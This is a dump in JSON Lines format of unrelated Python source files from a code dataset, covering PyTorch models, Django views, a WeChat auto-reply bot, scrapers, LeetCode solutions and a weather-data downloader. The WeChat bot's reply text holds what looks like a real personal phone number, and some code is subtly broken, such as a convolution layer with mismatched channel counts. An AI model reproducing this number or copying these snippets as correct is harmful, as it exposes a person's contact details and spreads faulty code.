os.path.exists('./net/arousal.pth'):\n # model = load_checkpoint('./net/arousal.pth')\n # print('Load saved Model')\n # else:\n model = Net(inputs=inputs).to(DEVICE)\n\n criterion = nn.CrossEntropyLoss()\n optimizer = optim.SGD(model.parameters(), lr=0.5)\n scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=int(epochs * 0.25), gamma=0.6)\n # optimizer = optim.Adam(model.parameters(), lr=1, weight_decay=0.5)\n train(model, optimizer, criterion, train_set, test_set, epochs, batch_size=8, scheduler=scheduler,\n save_path=save_path)\n\n\nif __name__ == '__main__':\n ta_data = pd.read_csv('../Validation/arousal.csv', header=None)\n tr_data = pd.read_csv('../Converted/Deap/6.Deap_Data_Mean/afd.csv', header=None)\n run(ta_data, tr_data)\n","sub_path":"NeuralNetwork/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"6580648","text":"import torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport utils\nimport numpy as np\n\nclass ConvNet(nn.Module):\n\n def __init__(self):\n super(ConvNet, self).__init__()\n self.conv1 = nn.Sequential(\n nn.Conv2d(\n in_channels=3,\n out_channels=64,\n kernel_size=5,\n stride=1,\n padding=2,\n ),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2),\n )\n self.conv2 = nn.Sequential(\n nn.Conv2d(64, 128, 5, 1, 2),\n nn.ReLU(), \n nn.MaxPool2d(2), \n )\n self.conv3 = nn.Sequential(\n nn.Conv2d(256, 512, 5, 1, 2),\n nn.ReLU(),\n nn.MaxPool2d(2),\n )\n self.conv4 = nn.Sequential(\n nn.Conv2d(512, 1024, 5, 1, 2),\n nn.ReLU(),\n nn.MaxPool2d(2),\n )\n self.fc1 = nn.Sequential(\n nn.Flatten(),\n nn.Linear(4096, 512),\n nn.ReLU(),\n )\n self.fc2 = nn.Sequential(\n nn.Linear(512, 50),\n nn.Tanh(),\n )\n self.fc3 = nn.Sequential(\n nn.Linear(50, 10),\n )\n self.out = nn.Softmax()\n self.g_fi = None\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.conv2(x)\n x = self.conv3(x)\n x = self.conv4(x)\n x = self.fc3(self.fc2(self.fc1(x)))\n self.g_fi = x\n return self.out(x)\n\nclass FCNet(nn.Module):\n\n def __init__(self):\n super(FCNet, self).__init__()\n self.fc1 = nn.Sequential(\n nn.Linear(512, 50),\n nn.ReLU()\n )\n self.fc2 = nn.Sequential(\n nn.Linear(50, 10),\n nn.Tanh()\n )\n self.out = nn.Softmax(dim=1)\n self.wfi = None\n\n def forward(self, x):\n x = self.fc1(x)\n x = self.fc2(x)\n self.wfi = x\n #print(x.shape)\n return self.out(x)\n\nclass Lossb(nn.Module):\n\n def __init__(self, n, alpha):\n super(Lossb, self).__init__()\n w = 1.0 / n\n self.n = n\n self.alpha = alpha\n self.wn = Variable(w * torch.ones((n - 1, 1)), requires_grad=True)\n self.W = torch.cat((self.wn, torch.ones((1,1)) - torch.sum(self.wn)))\n self.diff = torch.Tensor(self.W)\n\n def forward(self, x_out, I):\n loss = 0.0\n for i in range(utils.context_size):\n gx = torch.transpose(x_out, 1, 0)\n gx = gx[torch.arange(gx.size(0))!=i]\n wt = torch.transpose(self.W, 1, 0)\n ij = I[:, i]\n ten1 = torch.matmul(gx, (self.W * ij)) / torch.matmul(wt, ij)\n ten2 = torch.matmul(gx, (self.W * (1 - ij))) / torch.matmul(wt, 1 - ij)\n loss += torch.norm(ten1 - ten2) ** 2\n loss += self.alpha * (torch.norm(self.W) ** 2)\n return loss\n\n def update(self):\n new_w = torch.cat((self.wn, torch.ones((1,1)) - torch.sum(self.wn)))\n self.diff = new_w - self.W\n self.W = new_w\n diff = torch.norm(self.diff, p=1)\n return diff\n\nclass Lossp(nn.Module):\n\n def __init__(self, lam):\n super(Lossp, self).__init__()\n self.lam = lam\n\n def forward(self, gout, fout, y, W):\n lossq = -utils.lam * (torch.norm(gout)**2)\n loss = torch.sum(W * torch.log(torch.sum((fout * y), dim=1))) + lossq\n return loss\n\n","sub_path":"baseline/niid.py","file_name":"niid.py","file_ext":"py","file_size_in_byte":3418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"622064355","text":"from django.shortcuts import render,redirect\nfrom .form import *\nfrom django.contrib.auth import authenticate,login,logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponse\nfrom homepage.decorators import allowed_users\nfrom teacher.models import *\nfrom .models import Stud\nfrom homepage.friend_request import FriendRequest\nfrom teacher.form import Assignment_ans_Form\n\n\n\n@login_required(login_url='/home/login')\n@allowed_users(allowed_roles=['student'])\ndef student_profile(request):\n\treturn render(request, 'student_profile.html')\n\n@login_required(login_url='/home/login')\n@allowed_users(allowed_roles=['student'])\ndef student_req(request):\n\trequests = FriendRequest.objects.filter(from_user=request.user.stud)\n\treturn render(request, 'student_req.html',{'requests':requests})\n\t\n\n@login_required(login_url='/home/login')\n@allowed_users(allowed_roles=['student'])\ndef teachers(request):\n\tteachers=Tutor.objects.exclude(friends=request.user.stud)\n\treturn render(request, 'teachers.html',{'teachers':teachers})\n\n\n@login_required(login_url='/home/login')\n@allowed_users(allowed_roles=['student'])\ndef myclasses(request):\n\tteachers=Tutor.objects.filter(friends=request.user.stud)\n\treturn render(request, 'myclasses.html',{'teachers':teachers})\n\n\n@login_required(login_url='/home/login')\n@allowed_users(allowed_roles=['student'])\ndef view_lecture(request,id):\n\ttry:\n\t\tteacher=Tutor.objects.get(id=id, friends=request.user.stud)\n\t\texams=Exam.objects.filter(teacher=teacher).order_by('date_created')\n\t\treturn render(request, 'view_lecture.html',{'exams':exams,'teacher':teacher})\n\texcept:\n\t\treturn redirect('/shome/myclasses/') \n\n\n@login_required(login_url='/home/login')\n@allowed_users(allowed_roles=['student'])\ndef student_assignment_list(request):\n\tteachers=Tutor.objects.filter( friends=request.user.stud)\n\tassignments=Assignment_ques.objects.filter(teacher__in =teachers).order_by('date_created')\n\treturn render(request, 'student_assignment_list.html',{'assignments':assignments})\n\t\n\n@login_required(login_url='/home/login')\n@allowed_users(allowed_roles=['student'])\ndef assignment_ans_form(request,id):\n\tteachers=Tutor.objects.filter(friends=request.user.stud)\n\tassignment_q=Assignment_ques.objects.get(id=id)\n\tif assignment_q.teacher in teachers:\n\t\tform = Assignment_ans_Form()\n\t\tif request.method == 'POST':\n\t\t\tform = Assignment_ans_Form(request.POST)\n\t\t\tif form.is_valid():\n\t\t\t\tform.save()\n\t\t\t\tassignment_q.students.add(request.user.stud)\n\t\t\t\treturn redirect('/shome/assignment/')\n\t\tcontext ={'form':form}\n\t\treturn render(request, 'assignment_ans_form.html',context)\n\telse:\n\t\treturn redirect('/shome/assignment/') \n\n\n\n\n@login_required(login_url='/home/login')\n@allowed_users(allowed_roles=['student'])\ndef student_profile_update(request):\n\tform = StudentProfileForm(instance=request.user.stud)\n\tif request.method == 'POST':\n\t\tform = StudentProfileForm(request.POST,instance=request.user.stud)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn redirect('/shome/profile')\n\t\n\tcontext ={'form':form}\n\treturn render(request, 'student_profile_form.html',context)\n\n\n\n@login_required(login_url='/home/login')\n@allowed_users(allowed_roles=['student'])\ndef shome(request):\n\tteachers=Tutor.objects.filter(friends=request.user.stud)\n\trequests = FriendRequest.objects.filter(from_user=request.user.stud)\n\tassignments=Assignment_ans.objects.filter(student =request.user.stud)\n\t\n\tno_of_request=requests.count()\n\tno_of_class=teachers.count()\n\tno_of_assignment=assignments.count()\n\t\n\t\n\tcontext={'no_of_assignment':no_of_assignment,\n\t\t\t\t'no_of_request':no_of_request,\n\t\t\t\t'no_of_class':no_of_class\n\t\t\t\t}\n\n\treturn render(request, 'student_dashboard.html',context)","sub_path":"student/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"549792612","text":"import hashlib\n\nfrom . import DB, app\n\n\nclass TrackedDownload(object):\n\n MAX_USE = 3\n\n def __init__(self, **data):\n self.token = None\n for key, value in data.items():\n setattr(self, key, value)\n if not self.token:\n salt = app.config['SECRET_KEY']\n string = self.email.encode() + self.area.encode() + salt.encode()\n self.token = hashlib.sha512(string).hexdigest()[:8]\n\n def save(self):\n DB.commit('INSERT INTO tracked_download '\n '(first_name, last_name, email, company, token, area) '\n 'VALUES (?, ?, ?, ?, ?, ?)',\n [self.first_name, self.last_name, self.email, self.company,\n self.token, self.area])\n\n def use(self):\n DB.commit('UPDATE tracked_download SET used=used+1 '\n 'WHERE used180): #有没回的信息,且时间超过30秒,需要自动发送\n self.send_msg_by_uid(u'正在忙,请稍后联系 (本条为自动回复)', self.weixinid)\n self.send_msg_by_uid(u'本功能为本人编写,可能存在漏发,误发,迟发等一系列问题,敬请谅解,有急事可拨打电话18586108602。代码改编自wxBot,源代码已在github上更新。', self.weixinid)\n self.shifouxuyao=False\n except :\n print(\"出错了\")\n #print shifouxuyao,lastest_receive_time\n print(\"经历了一轮schedule\")+str(time.time())\n time.sleep(10)\n\n\n\ndef main():\n shifouxuyao=False\n weixinid=0\n lastest_receive_time=time.time()\n bot = MyWXBot()\n bot.DEBUG = True\n bot.conf['qr'] = 'png'\n bot.run()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"142395607","text":"from openmdao.core.explicitcomponent import ExplicitComponent\nimport numpy as np\n\n\nclass CostModelComponent(ExplicitComponent):\n def __init__(self, input_keys, n_wt, cost_function, cost_gradient_function=None,\n output_key=\"Cost\", output_unit=\"\", additional_output=[]):\n super().__init__()\n assert isinstance(n_wt, int), n_wt\n self.input_keys = list(input_keys)\n self.cost_function = cost_function\n self.cost_gradient_function = cost_gradient_function\n self.n_wt = n_wt\n self.output_key = output_key\n self.output_unit = output_unit\n self.additional_output = additional_output\n\n def setup(self):\n for i in self.input_keys:\n if isinstance(i, tuple) and len(i) == 2:\n self.add_input(i[0], val=i[1])\n else:\n self.add_input(i, val=np.zeros(self.n_wt))\n self.add_output('cost', val=0.0)\n self.add_output(self.output_key, val=0.0)\n for key, val in self.additional_output:\n self.add_output(key, val=val)\n\n input_keys = list([(i, i[0])[isinstance(i, tuple)] for i in self.input_keys])\n if self.cost_gradient_function:\n self.declare_partials('cost', input_keys)\n else:\n # Finite difference all partials.\n self.declare_partials('cost', input_keys, method='fd')\n self.declare_partials(self.output_key, input_keys)\n\n def compute(self, inputs, outputs):\n if self.additional_output:\n c, additional_output = self.cost_function(**inputs)\n for k, v in additional_output.items():\n outputs[k] = v\n else:\n c = self.cost_function(**inputs)\n outputs['cost'] = c\n outputs[self.output_key] = c\n\n def compute_partials(self, inputs, J):\n if self.cost_gradient_function:\n for k, dCostdk in zip(self.input_keys,\n self.cost_gradient_function(**inputs)):\n if dCostdk is not None:\n J['cost', k] = dCostdk\n J[self.output_key, k] = dCostdk\n\n\nclass IncomeModelComponent(CostModelComponent):\n\n def compute(self, inputs, outputs):\n CostModelComponent.compute(self, inputs, outputs)\n outputs['cost'] *= -1\n\n def compute_partials(self, inputs, J):\n if self.cost_gradient_function:\n CostModelComponent.compute_partials(self, inputs, J)\n for k in dict(inputs).keys():\n J['cost', k] *= -1\n\n\nclass AEPCostModelComponent(IncomeModelComponent):\n def __init__(self, input_keys, n_wt, cost_function, cost_gradient_function=None, output_unit=\"\", additional_output=[]):\n IncomeModelComponent.__init__(self, input_keys, n_wt, cost_function,\n cost_gradient_function=cost_gradient_function,\n output_key=\"AEP\", output_unit=output_unit,\n additional_output=additional_output)\n","sub_path":"topfarm/cost_models/cost_model_wrappers.py","file_name":"cost_model_wrappers.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"558090773","text":"\"\"\"\n138. Copy List with Random Pointer\n\nA linked list is given such that each node contains an additional random pointer which could point to any node in the list or null.\n\nReturn a deep copy of the list.\n\n\n\n\"\"\"\n\n\n# Definition for singly-linked list with a random pointer.\n# class RandomListNode(object):\n# def __init__(self, x):\n# self.label = x\n# self.next = None\n# self.random = None\n\nclass Solution(object):\n def __init__(self):\n self.visited = {}\n\n def copyRandomList(self, head):\n \"\"\"\n :type head: RandomListNode\n :rtype: RandomListNode\n \"\"\"\n if not head: return head\n old = head\n new = RandomListNode(old.label)\n self.visited[old] = new\n while old:\n new.random = self.clonenode(old.random)\n new.next = self.clonenode(old.next)\n new = new.next\n old = old.next\n return self.visited[head]\n\n def clonenode(self, node):\n if node:\n if node in self.visited:\n return self.visited[node]\n else:\n self.visited[node] = RandomListNode(node.label)\n return self.visited[node]\n return None\n\n#cpp, rewrite, dfs\n\n'''\n/**\n * Definition for singly-linked list with a random pointer.\n * struct RandomListNode {\n * int label;\n * RandomListNode *next, *random;\n * RandomListNode(int x) : label(x), next(NULL), random(NULL) {}\n * };\n */\nclass Solution {\n unordered_map m;\npublic:\n RandomListNode *copyRandomList(RandomListNode *head) {\n if (head == nullptr) return head;\n if (m.find(head) != m.end()) return m[head];\n RandomListNode* node = new RandomListNode(head->label); \n m[head] = node;\n node->next = copyRandomList(head->next);\n node->random = copyRandomList(head->random);\n return node;\n \n }\n};\n'''\n\n\n# 2020/04/29, similar to lc 133\n\n'''\nRuntime: 36 ms, faster than 60.71% of Python3 online submissions for Copy List with Random Pointer.\nMemory Usage: 14.2 MB, less than 100.00% of Python3 online submissions for Copy List with Random Pointer.\n'''\n\n\n\"\"\"\n# Definition for a Node.\nclass Node:\n def __init__(self, x: int, next: 'Node' = None, random: 'Node' = None):\n self.val = int(x)\n self.next = next\n self.random = random\n\"\"\"\n\n\nclass Solution:\n def copyRandomList(self, head: 'Node') -> 'Node':\n if not head: return None\n copy = self.make_copy(head)\n dummy = head\n while head:\n if head.random: copy[head].random = copy[head.random]\n if head.next: copy[head].next = copy[head.next]\n head = head.next\n return copy[dummy]\n\n def make_copy(self, head):\n m = {}\n while head:\n m[head] = Node(head.val)\n head = head.next\n return m","sub_path":"0138. Copy List with Random Pointer.py","file_name":"0138. Copy List with Random Pointer.py","file_ext":"py","file_size_in_byte":2903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"546922263","text":"\"\"\"\r\nAnalysis of emotional tendency\r\n调用百度NLP接口实现情感倾向分析\r\n\"\"\"\r\n\r\nfrom aip import AipNlp\r\nimport openpyxl\r\nimport os\r\nimport time\r\n\r\n# baidu api information\r\nAPP_ID = ''\r\nAPI_KEY = ''\r\nSECRET_KEY = ''\r\nclient = AipNlp(APP_ID, API_KEY, SECRET_KEY)\r\n\r\n# set sleep time to use baidu api\r\ndef sleeptime(hour,min,sec):\r\n return hour*3600 + min*60 + sec\r\n\t\t\r\n# 调用百度NLP的评论情感分析API,获得情感极性分类结果\r\ndef get_sentiments(text):\r\n\tresult = []\r\n\ttry:\r\n\t\tsentiment_result = client.sentimentClassify(text)['items'][0]\r\n\t\tpositive_prob = sentiment_result['positive_prob'] #表示属于积极类别的概率\r\n\t\tnegative_prob = sentiment_result['negative_prob'] #表示属于消极类别的概率\r\n\t\tconfidence = sentiment_result['confidence'] #表示分类的置信度\r\n\t\tsentiment = sentiment_result['sentiment'] #表示情感极性分类结果, 0:负向,1:中性,2:正向\r\n\t\tresult = [positive_prob,negative_prob,confidence,sentiment]\r\n\t# 异常处理,此处忽略\r\n\texcept Exception as e:\r\n\t\tpass\r\n\treturn result\r\n\r\n# 对excel中的评论逐条处理并将获得的情感分析结果保存到原文件中\r\ndef process_excel(file_path):\r\n\tdata = openpyxl.load_workbook(file_path)\r\n\ttable = data.active\r\n\tnrows = table.max_row\r\n\tfor i in range(2,nrows+1):\r\n\t\t# 拼接文本位置\r\n\t\ttext_location = 'C'+str(i)\r\n\t\t# 提取文本内容\r\n\t\ttext = table[text_location].value\r\n\t\tif text:\r\n\t\t\t# 百度评论分类\r\n\t\t\tresult = get_sentiments(text)\r\n\t\t\t# 保存结果\r\n\t\t\tif result:\r\n\t\t\t\ttable.cell(row=int(i), column=5).value = result[0]\r\n\t\t\t\ttable.cell(row=int(i), column=6).value = result[1]\r\n\t\t\t\ttable.cell(row=int(i), column=7).value = result[2]\r\n\t\t\t\ttable.cell(row=int(i), column=8).value = result[3]\r\n\tdata.save(file_path)\r\n\r\n\r\ndef main():\r\n\tsecond = sleeptime(0,0,2)\r\n\tfilefolder = r''\r\n\tfor file in os.listdir(filefolder):\r\n\t\t# only process excel file\r\n\t\tprint(os.path.splitext(file)[-1])\r\n\t\tif os.path.splitext(file)[-1] in ['.xlsx']:\r\n\t\t file_path = os.path.join(filefolder, file)\r\n\t\t process_excel(file_path)\r\n\t\t time.sleep(second) #随机休眠\r\n\t\t \r\n\r\nif __name__ == '__main__':\r\n\tmain()","sub_path":"emotional _tendency_analysis.py","file_name":"emotional _tendency_analysis.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"216518186","text":"#covid19_get.py for Mac\n#Author: Masafumi Hiura\n#This code access covid19 web site of toyokeizai.net in Japan, and get screenshot of the web page.\n#Japanese site is https://toyokeizai.net/sp/visual/tko/covid19/\n#English site is https://toyokeizai.net/sp/visual/tko/covid19/en.html\n#You need to install selenium by using pip before execute this code.\n#You need to download chromedriver for your OS.\n#This code see select tag(id=\"select-prefecture\") of html, and get screenshot of the result of prefecture one by one.\n\nfrom selenium import webdriver\nfrom selenium.webdriver.support.select import Select\nimport time\nimport datetime\n\ndt_now = datetime.datetime.now()\ndt_now_s = dt_now.strftime('%Y%m%d%H%M%S')\n\noptions = webdriver.ChromeOptions()\noptions.add_argument('--headless')\noptions.add_argument('--no-sandbox')\noptions.add_argument('--disable-dev-shm-usage')\ndriver = webdriver.Chrome('./chromedriver_macm1',options=options)\n\ndriver.get('https://toyokeizai.net/sp/visual/tko/covid19/')\nw = driver.execute_script(\"return document.body.scrollWidth;\")\nh = driver.execute_script(\"return document.body.scrollHeight;\")\ndriver.set_window_size(w, h)\ndriver.execute_script('window.scrollTo(0, document.body.scrollWidth);')\ndriver.execute_script('window.scrollTo(0, document.body.scrollHeight);')\n#driver.execute_script(\"document.body.style.zoom='30%'\")\ndropdown = driver.find_element_by_id('select-prefecture')\nselect = Select(dropdown)\n\nall_options = select.options\nfor option in all_options:\n print(option.text)\n print(option.get_attribute('outerHTML'))\n print(option.get_attribute('value'))\n print('----------------------------')\n select.select_by_value(option.get_attribute('value')) #\n driver.save_screenshot(\"/Users/masafumihiura/selenium/screen_shot/\" + dt_now_s + \"_\" + option.get_attribute('value') + \".png\")\n time.sleep(2)\n\ndriver.quit()","sub_path":"covid19_get_macm1.py","file_name":"covid19_get_macm1.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"388583059","text":"import socket\n\n\nHOST = socket.gethostbyname(socket.gethostname())\nPORT = 5050\n\n\nwith socket.socket(socket.AF_INET,socket.SOCK_STREAM) as s:\n s.bind((HOST,PORT))\n s.listen()\n conn, addr = s.accept()\n with conn:\n print('connected by', addr)\n while True:\n data = conn.recv(1024).decode('UTF-8')\n if not data:\n break\n\n string1 = (\"Message in Uppercase: \" + data.upper())\n arr = bytes(string1, 'utf-8')\n conn.sendall(arr)","sub_path":"Q2server.py","file_name":"Q2server.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"363452201","text":"# -*- coding: utf-8 -*-\n\ntry:\n # noinspection PyUnresolvedReferences\n from urllib.parse import urljoin\nexcept ImportError:\n # noinspection PyUnresolvedReferences\n from urlparse import urljoin\n\n\nclass NavigationProperty(object):\n \"\"\"\n A Property-like object for marking relationships between entities, but does\n not inherit from PropertyBase.\n \"\"\"\n def __init__(self, name, entitycls, collection=False, foreign_key=None):\n from odata.property import PropertyBase\n self.name = name\n self.entitycls = entitycls\n self.is_collection = collection\n if isinstance(foreign_key, PropertyBase):\n self.foreign_key = foreign_key.name\n else:\n self.foreign_key = foreign_key\n\n def __repr__(self):\n return u''.format(self.entitycls)\n\n def instances_from_data(self, raw_data):\n if self.is_collection:\n return [self.entitycls.__new__(self.entitycls, from_data=d) for d in raw_data]\n else:\n return self.entitycls.__new__(self.entitycls, from_data=raw_data)\n\n def _get_parent_cache(self, instance):\n es = instance.__odata__\n ic = es.nav_cache\n if self.name not in ic:\n cache = {}\n ic[self.name] = cache\n else:\n cache = ic[self.name]\n return cache\n\n def __set__(self, instance, value):\n \"\"\"\n :type instance: odata.entity.EntityBase\n \"\"\"\n cache = self._get_parent_cache(instance)\n if self.is_collection:\n cache['collection'] = value\n else:\n cache['single'] = value\n instance.__odata__.set_property_dirty(self)\n\n def __get__(self, instance, owner):\n \"\"\"\n :type instance: odata.entity.EntityBase\n \"\"\"\n if instance is None:\n return self\n\n es = instance.__odata__\n parent_url = es.instance_url\n new_object = parent_url is None\n cache = self._get_parent_cache(instance)\n\n if new_object:\n if self.is_collection:\n return cache.get('collection', [])\n return cache.get('single', None)\n\n parent_url += '/'\n url = urljoin(parent_url, self.name)\n cnx = self.entitycls.__odata_connection__\n\n if self.is_collection:\n if 'collection' not in cache:\n raw_data = cnx.execute_get(url)\n if raw_data:\n cache['collection'] = self.instances_from_data(raw_data['value'])\n else:\n cache['collection'] = []\n return cache['collection']\n else:\n if 'single' not in cache:\n raw_data = cnx.execute_get(url)\n if raw_data:\n cache['single'] = self.instances_from_data(raw_data)\n else:\n cache['single'] = None\n return cache['single']\n","sub_path":"odata/navproperty.py","file_name":"navproperty.py","file_ext":"py","file_size_in_byte":2947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"123321218","text":"__author__ = 'user'\nimport time\nimport logging\nimport datetime\nfrom logging import handlers\nimport multiprocessing as mp\nimport signal\nimport zmq\n\nimport worker_api\n\nclass Killer:\n def __init__(self, logger):\n self.logger = logger\n signal.signal(signal.SIGTERM, self.signal_handler)\n signal.signal(signal.SIGINT, self.signal_handler)\n self.exit_now = False\n\n def signal_handler(self, signum, frame):\n self.logger.info('Got signal')\n context = zmq.Context()\n controller = context.socket(zmq.PUB)\n controller.bind('tcp://*:33304')\n time.sleep(1)\n controller.send('TERM')\n self.exit_now = True\n self.logger.info('Signals sent to worker')\n\n\ndef set_logger():\n file_name = '/opt/pokerist/processor/gate_logs/gate_%s.log' % str(datetime.datetime.now().strftime(\"%Y_%m_%d_%H_%M_%S\"))\n gate_logger = logging.getLogger('gate_logger')\n gate_handler = handlers.TimedRotatingFileHandler(file_name, when='H')\n gate_handler.setFormatter(logging.Formatter('%(asctime)s %(levelname)s:%(message)s'))\n gate_logger.addHandler(gate_handler)\n level_main = logging.getLevelName('INFO')\n gate_logger.setLevel(level_main)\n return gate_logger\n\nif __name__ == '__main__':\n gate_logger = set_logger()\n try:\n\n context = zmq.Context()\n work = worker_api.Worker('33302')\n\n pull_bind = 'tcp://*:33300'\n receiver = context.socket(zmq.PULL)\n receiver.bind(pull_bind)\n gate_logger.info('Binded to: %s' % pull_bind)\n\n push_worker = 'tcp://*:33302'\n sender = context.socket(zmq.PUSH)\n sender.bind(push_worker)\n gate_logger.info('Binded to: %s' % push_worker)\n\n for i in range(8):\n process = mp.Process(target=work.filter_event, args=())\n process.daemon = True\n process.start()\n gate_logger.info('Worker started with pid: %s' % process.pid)\n\n current_time = time.time()\n count = 0\n\n killer = Killer(gate_logger)\n\n while killer.exit_now is False:\n\n if time.time() - current_time > 60:\n gate_logger.info('For 1 minute processed: %s rows ' % count)\n count = 0\n current_time = time.time()\n else:\n\n protobuf = receiver.recv()\n sender.send(protobuf)\n count += 1\n\n except Exception as e:\n gate_logger.exception(e.message)\n\n","sub_path":"production/gate_server.py","file_name":"gate_server.py","file_ext":"py","file_size_in_byte":2470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"256386812","text":"import functools\n\n\ndef editRecursive(s: str, t: str) -> int:\n if not s:\n return len(t)\n elif not t:\n return len(s)\n\n delete_cost = editRecursive(s[:-1], t) + 1\n insert_cost = editRecursive(s, t[:-1]) + 1\n match_cost = editRecursive(s[:-1], t[:-1])\n if s[-1] != t[-1]:\n match_cost += 1\n\n return min(insert_cost, delete_cost, match_cost)\n\n\ndef editRecursiveBounded(s: str, t: str, limit: int) -> float:\n if limit < 0:\n return float(\"inf\")\n if not s:\n return len(t)\n elif not t:\n return len(s)\n\n delete_cost = editRecursiveBounded(s[:-1], t, limit - 1) + 1\n insert_cost = editRecursiveBounded(s, t[:-1], limit - 1) + 1\n if s[-1] == t[-1]:\n match_cost = editRecursiveBounded(s[:-1], t[:-1], limit)\n else:\n match_cost = editRecursiveBounded(s[:-1], t[:-1], limit - 1) + 1\n\n return min(insert_cost, delete_cost, match_cost)\n\n\nassert editRecursive(\"\", \"\") == 0\nassert editRecursive(\"a\", \"a\") == 0\nassert editRecursive(\"aaa\", \"aaa\") == 0\nassert editRecursive(\"aaa\", \"abb\") == 2\nassert editRecursive(\"aa\", \"bb\") == 2\nassert editRecursive(\"aa\", \"bbbb\") == 4\n\n# assert editRecursiveBounded(\"food\", \"money\", 5) == 4\n# assert editRecursiveBounded(\"algorithm\", \"altruistic\", 5) == float(\"inf\")\nassert editRecursive(\"algorithm\", \"altruistic\") == 6\nassert editRecursive(\"food\", \"money\") == 4\n\n\ndef editRecursiveDP(s: str, t: str) -> int:\n M, N = len(s) + 1, len(t) + 1\n distance = [[0 for _ in range(M)] for _ in range(N)]\n\n # Fill in the cost of the rows if the other string is empty\n for i in range(M):\n distance[0][i] = i\n for j in range(N):\n distance[j][0] = j\n\n # Now fill in the rest of the table\n for i in range(1, N):\n for j in range(1, M):\n equals = s[j - 1] == t[i - 1]\n diagonal = distance[i - 1][j - 1]\n if equals:\n distance[i][j] = diagonal\n else:\n above = distance[i - 1][j]\n left = distance[i][j - 1]\n distance[i][j] = 1 + min(diagonal, above, left)\n\n return distance[-1][-1]\n\n\n# assert editRecursiveDP(\"\", \"\") == 0\n# assert editRecursiveDP(\"a\", \"a\") == 0\n# assert editRecursiveDP(\"aaa\", \"aaa\") == 0\n# assert editRecursiveDP(\"aaa\", \"abb\") == 2\n# assert editRecursiveDP(\"aa\", \"bb\") == 2\n# assert editRecursiveDP(\"ab\", \"a\") == 1\n# assert editRecursiveDP(\"algorithm\", \"altruistic\") == 6\n# assert editRecursiveDP(\"food\", \"money\") == 4\n","sub_path":"edit_distance.py","file_name":"edit_distance.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"73810091","text":"#!/usr/bin/env python\n\"\"\"Some convenience files to grab meteorological data and convert\nto CABO format to use within WOFOST. So far, using ERA5\n\"\"\"\nimport datetime as dt\nimport logging\nimport optparse\nfrom collections import namedtuple\nfrom concurrent.futures import ThreadPoolExecutor\nfrom functools import partial\nfrom pathlib import Path\n\nimport cdsapi\nimport numpy as np\n\nJASMIN_ERA5 = \"/gws/nopw/j04/odanceo/public/ERA5_meteo/\"\n\nERAPARAMS = namedtuple(\n \"ERAPARAMS\", [\"ssrd\", \"mx2t\", \"mn2t\", \"tp\", \"u10\", \"v10\", \"d2m\"]\n)\nLOG = logging.getLogger(__name__)\nLOG.setLevel(logging.DEBUG)\nif not LOG.handlers:\n ch = logging.StreamHandler()\n ch.setLevel(logging.DEBUG)\n formatter = logging.Formatter(\n \"%(asctime)s - %(name)s - \" + \"%(levelname)s - %(message)s\"\n )\n ch.setFormatter(formatter)\n LOG.addHandler(ch)\nLOG.propagate = False\n\nHELP_TEXT = \"\"\"\nSYNOPSIS\n./era_downloader.py\nDESCRIPTION\nA program to download Copernicus data.\nEXAMPLES\n./era_downloader.py -v \\\n\n\nEXIT STATUS\n No exit status yet, can't be bothered.\nAUTHOR\n J Gomez-Dans \n See also https://github.com/NCEO-ODA/ghana_data\n\"\"\"\n\n\ndef grab_era5(month, year, output_folder, region, mylat, mylon):\n \"\"\"A function to download ERA5 Lande data for one month. Assumes\n the Copernicus Data Service API works and is properly configured.\n\n Downloaded files have names `{region}.{year}_{month}.nc`.\n\n Function checks whether the file already exists before requesting\n the data, as requesting the data takes a while.\n\n Parameters\n ----------\n month: int\n The month number\n year: int\n The year number\n output_folder : str\n The output folder where the files will be saved to.\n region: str\n Name of the region. Useful for saving the data.\n mylat : 2-tuple, 2-list\n North and South Latitudes in decimal degrees.\n mylon : float\n West and East Longitudes in decimal degrees.\n \"\"\"\n\n output_folder = Path(output_folder) / \"netcdf\"\n output_folder.mkdir(parents=True, exist_ok=True)\n output_nc_file = (\n output_folder / f\"ERA5_{region:s}.{year:d}_{month:02d}.nc\"\n )\n # This is needed to keep getting the updated ERA5 datasets\n today = dt.datetime.now()\n delta_t = today - dt.datetime(year, month, 1)\n\n if not output_nc_file.exists() or (0 <= delta_t.days <= 120):\n\n LOG.info(f\"Downloading {year}-{month}\")\n # '80/-50/-25/0', # North, West, South, East.\n area = (\n f\"{int(mylat[1]):d}/{int(mylon[0]):d}/\"\n + f\"{int(mylat[0]):d}/{int(mylon[1]):d}\"\n )\n c = cdsapi.Client()\n c.retrieve(\n \"reanalysis-era5-single-levels\",\n {\n \"format\": \"netcdf\",\n \"variable\": [\n 